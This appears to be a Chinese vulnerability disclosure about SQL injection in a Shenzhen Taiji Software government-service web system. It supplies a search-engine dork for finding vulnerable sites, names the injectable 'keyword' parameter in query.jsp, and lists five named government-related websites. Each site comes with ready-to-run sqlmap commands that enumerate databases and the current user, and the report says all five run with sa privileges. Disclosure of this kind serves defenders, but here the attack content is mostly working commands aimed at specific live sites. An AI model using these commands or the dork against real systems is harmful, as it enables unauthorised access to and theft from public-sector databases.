### 简要描述:
rt
### 详细说明:
问题厂商:深圳太极软件有限公司
问题cms:jsp+sqlserver
注入全为sa权限
谷歌关键字:inurl:application/zwdt
问题出在 全局搜索
application/zwdt/query.jsp post:keyword=
选取五例:
1.http://www.lzxzsp.gov.cn
sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs
[<img src="https://images.seebug.org/upload/201409/251813432721569eb63dd1e2dc6f27feb4fee067.jpg" alt="21.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251813432721569eb63dd1e2dc6f27feb4fee067.jpg)
sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user
[<img src="https://images.seebug.org/upload/201409/25181411b61d0ce9ec880bf80580755fc4248bd7.jpg" alt="22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25181411b61d0ce9ec880bf80580755fc4248bd7.jpg)
2.http://www.cqwsxzfw.com/
sqlmap -u "http://www.cqwsxzfw.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs
[<img src="https://images.seebug.org/upload/201409/25181921d6996ffd8a21f52f59c6e2694039feb1.jpg" alt="23.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25181921d6996ffd8a21f52f59c6e2694039feb1.jpg)
sqlmap -u "http://www.cqwsxzfw.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user
[<img src="https://images.seebug.org/upload/201409/251818415cafdf12b03b4dc77ee47add3ca34a5e.jpg" alt="24.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251818415cafdf12b03b4dc77ee47add3ca34a5e.jpg)
### 漏洞证明:
3.http://www.ddkspdt.com
sqlmap -u "http://www.ddkspdt.com/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --dbs
[<img src="https://images.seebug.org/upload/201409/2518282648d0551b5608e520984ef72849739daa.jpg" alt="25.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2518282648d0551b5608e520984ef72849739daa.jpg)
sqlmap -u "http://www.ddkspdt.com/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --current-user
[<img src="https://images.seebug.org/upload/201409/251821355023c9caeea7832491bcb5d31aec3424.jpg" alt="26.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251821355023c9caeea7832491bcb5d31aec3424.jpg)
4.http://www.xsspfwdt.cn
sqlmap -u "http://www.xsspfwdt.cn/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --dbs
[<img src="https://images.seebug.org/upload/201409/25182331b459048c7ca8a038a4e58dc432a03562.jpg" alt="27.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25182331b459048c7ca8a038a4e58dc432a03562.jpg)
sqlmap -u "http://www.xsspfwdt.cn/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --current-user
[<img src="https://images.seebug.org/upload/201409/251823401bb5d5114453966d4993df3d35495637.jpg" alt="28.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251823401bb5d5114453966d4993df3d35495637.jpg)
5.http://www.cqspbxz.com/
sqlmap -u "http://www.cqspbxz.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs
[<img src="https://images.seebug.org/upload/201409/25184456ee13a817af8e8373bc7dfa2d4b370853.jpg" alt="123123213.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25184456ee13a817af8e8373bc7dfa2d4b370853.jpg)
sqlmap -u "http://www.cqspbxz.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user
[<img src="https://images.seebug.org/upload/201409/25184336838d2df98e1b8c8b6da71b86849ae23d.jpg" alt="QQ图片20140925184305.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25184336838d2df98e1b8c8b6da71b86849ae23d.jpg)
京公网安备 11010502034610号
暂无评论